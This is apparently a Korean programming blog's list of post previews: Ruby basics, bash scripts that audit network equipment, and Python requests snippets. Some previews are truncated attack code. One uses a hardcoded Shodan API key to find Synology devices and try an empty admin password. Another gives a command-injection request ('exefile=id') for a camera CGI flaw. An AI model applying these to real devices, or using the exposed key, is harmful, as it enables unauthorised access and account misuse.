목록프로그래밍 (73)
Self-Improvement
접근 제어 Public 메소드는 누구나 호출할 수 있으며 기본적으로 Public으로 선언된다. Protected 메소드는 그 객체를 정의한 클래스와 하위 클래스에서만 호출할 수 있다. Private 메소드는 오직 현재 객체의 문맥 하에서만 호출할 수 있다. 각 접근제어를 선언 후에 작성 예제코드 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 class Test def method1 p "public method1" end protected def method2 p "protected method2" end private def method3 p "private method3" end public def method4 p "public method4" end e..
이름으로 용도를 구분할 수 있는 표 지역 변수 name, fish_and_chips, _x, _26 인스턴스 변수 @name, @point_1, @x, @_ 클래스 변수 @@total, @@symtab, @@x_pos 전역 변수 $debug, $CUSTOMER, $_Golbal 클래스 이름 String, MyClass 상수 이름 FEET_PER_MILE, DEBUG 인자 읽고 쓰기 인자의 길이와 "p", "puts"로 쓰일때의 다른점 1 2 3 4 puts "arguments #{ARGV.size}" p ARGV p ARGV[3] puts ARGV cs 읽어들여 쓰기 예제코드 "p", "puts", "print" 차이 1 2 3 4 str=gets p str puts str print str cs 메소드..
bash, batch 코드를 처음 배우고나서 프로젝트성??으로 2018년에 작성해봤던 자료를 저장, 정리 네트워크 장비 보안 (Bash) EX) N-14.sh 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 #!/bin/bash . function-net.sh MAIN1 LIST4 BAR CODE [N-14] NTP 서버 연동 LEVEL 중 cat $RESULT [ 양호 ] : NTP 서비스가 서버로 설정된 경우 [ 취약 ] : NTP 서비스를 사용하지 않거나, 서버와 연동되어 있지 않은 경우 EOF BAR PRINT1 if [ -f network-config ] ; then NTP1=`grep ^ntp netwo..
코드 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import requests s = requests.Session() https_check=Https_Check(target, port,s) url=https_check+"://"+target+":"+port s.get(url, verify=False) def Https_Check(target, port,s): try: resp=s.get('http://%s:%s' %(target,port)) if resp.status_code==400: return 'https' else: return 'http' except requests.exceptions.ConnectionError as e: return 'https' exc..
첫번째 코드 파일과 파일의 내용을 정해서 전송 1 2 3 4 5 import requests #proxies = {"http":"http://127.0.0.1:8080"} requests.post("http://192.168.0.1/test", \ files={"userfile":("pwn.txt",'one,two,zap,zap\none,two,three,Uppercut')}) cs Request 123456789101112131415POST /test HTTP/1.1Host: 192.168.0.1Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0Content-Length: 185Conten..
보호되어 있는 글입니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 import requests import sys ####ssl-warnings InsecureRequestWarning EXCEPT CASE 1 from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) proxies={ 'http':'http://loc..
resp=s.post(url, data=data) print resp.elapsed.total_seconds()
import shodan import requests import subprocess import re from colorama import Fore from xml.etree import ElementTree as ET SHODAN_API_KEY = 'GKja8yvDZh5B1gDF6jhz64hTJkPtOCUV' count=0 query='synology port:1900' data=(('command','login'),('username','admin'),('password','')) def shodan_query(): try: api = shodan.Shodan(SHODAN_API_KEY) result = api.search(query, page=1) #You can modify the page ex..
import requests from requests.auth import HTTPDigestAuth s = requests.Session() s.auth=HTTPDigestAuth('admin',before_pass) resp=s.get(url) # -*- coding: cp949 -*- # CVE : NCVE-2016-0045 # Description : # cgi-bin/supervisor/CloudSetup.cgi의 exefile 파라미터에서 관리자 권한으로 명령 실행이 가능한 Remote Code Execute가 발생하는 취약점 ''' ----REQUEST---- GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=id HTTP/1.1 ----RESPONSE---..